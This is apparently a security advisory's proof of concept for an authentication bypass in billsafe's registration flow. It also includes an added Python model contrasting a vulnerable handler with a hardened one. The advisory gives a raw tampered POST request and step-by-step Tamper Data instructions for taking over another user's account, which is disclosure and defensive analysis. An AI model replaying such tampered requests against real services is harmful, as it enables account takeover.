Proof of Concept:
=================
The auth bypass vulnerability can be exploited by remote attackers without user interaction and without a privileged application user account.
For demonstration or to reproduce ...

Requirement(s):
[+] Browser (Mozilla Firefox)
[+] Tamper Data - Addon
[+] A second valid registration session whose values can be changed

Registration(s):

http://client.billsafe.de/login/register/id/aa3a863357fe6acb0fe16f7cce1a46d135235

Host=client.billsafe.de
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding=gzip, deflate
DNT=1
Connection=keep-alive
Referer=http://client.billsafe.de/login/first-login/
Cookie=__utma=22145316.759281629.1356643963.1356643963.1356653145.2; __utmc=22145316; __utmz=22145316.1356643963.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=billsafe%20paypal; PHPSESSID=mdkgkm8j91n4d57hdl8c9bjqo6; __utmb=22145316.96.9.1356654870355
Cache-Control=max-age=0
Content-Type=application/x-www-form-urlencoded
Content-Length=92
POSTDATA=clientId=35235&password=benjamin337&email=bkm%40vulnerability-lab.com&integration=prepared

Reference(s):
http://client.billsafe.de/login/first-login/

Manual steps to reproduce ...
1. Start your web browser and open the billsafe website.
2. Register a user account via the main registration form.
3. Go to your mailbox and copy the link that carries the registration session id.
4. Open the browser, start Tamper Data and load the request (mail link) of the login register id.
5. Tamper Data shows the plain request content, which can be changed to your own values.
6. Hold the request and change the values (clientId, email, password) to your own new email account or password.
7. Reload the page, change to your own new password, load the mail.
8. Registration successful. You can now log in with the account details of any other user.
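The steps above only work because the first-login handler takes the identity being registered (clientId, email) from the POST body, while the id in the mail link merely opens the page. The following is an added illustration written for this page; it is not billsafe's code and not part of the advisory. It models that server-side logic in two variants: one that trusts the body fields, as the advisory describes, and one that binds the request to the server-side registration record behind the mail-link token and refuses body fields that disagree with it. All names (sample_state, register_vulnerable, register_hardened, the tok_* tokens, the example.com addresses, the 90001 attacker clientId) and the sample records are constructed for the example; only clientId 35235 and the form field names come from the advisory's request.

```python
from urllib.parse import parse_qs


def sample_state():
    """Constructed sample data (hypothetical, not real billsafe records).
    Registration tokens are the ids carried in the first-login mail link; each one was
    issued for exactly one clientId/email pair. Accounts receive their password on first login."""
    registrations = {
        "tok_victim":   {"clientId": "35235", "email": "victim@example.com", "used": False},
        "tok_attacker": {"clientId": "90001", "email": "attacker@example.com", "used": False},
    }
    accounts = {
        "35235": {"email": "victim@example.com", "password": None},
        "90001": {"email": "attacker@example.com", "password": None},
    }
    return registrations, accounts


def register_vulnerable(token, body, registrations, accounts):
    """Models the behaviour the advisory describes: the token only decides whether the page
    is served; the identity being registered comes from attacker-controlled POST data."""
    if token not in registrations:
        return 404, "unknown registration link"
    form = parse_qs(body)
    client_id = form["clientId"][0]                 # taken from the body, never cross-checked
    account = accounts.get(client_id)
    if account is None:
        return 404, "unknown client"
    account["email"] = form["email"][0]             # attacker's address replaces the victim's
    account["password"] = form["password"][0]       # attacker's password is set on the victim's account
    return 200, f"registration successful for clientId {client_id}"


def register_hardened(token, body, registrations, accounts):
    """Binds the request to the server-side registration record, treats body fields that
    would change identity as tampering, and makes the link single-use."""
    reg = registrations.get(token)
    if reg is None or reg["used"]:
        return 403, "invalid or already used registration link"
    form = parse_qs(body)
    # A client-supplied clientId or email that disagrees with the record is rejected outright.
    if form.get("clientId", [reg["clientId"]])[0] != reg["clientId"]:
        return 400, "clientId does not match registration link"
    if form.get("email", [reg["email"]])[0] != reg["email"]:
        return 400, "email does not match registration link"
    password = form.get("password", [""])[0]
    if len(password) < 8:
        return 400, "password too short"
    accounts[reg["clientId"]]["password"] = password   # identity comes from the record, not the body
    reg["used"] = True
    return 200, f"registration successful for clientId {reg['clientId']}"


# The advisory's tampered request, reconstructed: the attacker uses their own mail link but
# rewrites clientId to the victim's id and sets email/password to values they control.
TAMPERED_BODY = "clientId=35235&password=attacker-pw1&email=attacker%40example.com&integration=prepared"


def demo():
    """Replays the tampered request against both handlers on fresh state.
    Returns (vulnerable_status, hardened_status, victim_pw_after_vulnerable, victim_pw_after_hardened)."""
    regs, accts = sample_state()
    vuln_status, _ = register_vulnerable("tok_attacker", TAMPERED_BODY, regs, accts)
    victim_pw_vuln = accts["35235"]["password"]

    regs, accts = sample_state()
    hard_status, _ = register_hardened("tok_attacker", TAMPERED_BODY, regs, accts)
    victim_pw_hard = accts["35235"]["password"]
    return vuln_status, hard_status, victim_pw_vuln, victim_pw_hard


if __name__ == "__main__":
    print(demo())
```

Running demo() shows the vulnerable handler answering 200 and leaving the victim's account (35235) with the attacker's password, while the hardened handler answers 400 and leaves the victim's record untouched. The single-use flag is what stops a captured mail link from being replayed later with different values; the "second valid registration session" the advisory lists as a requirement is exactly the attacker-owned token used in the demo.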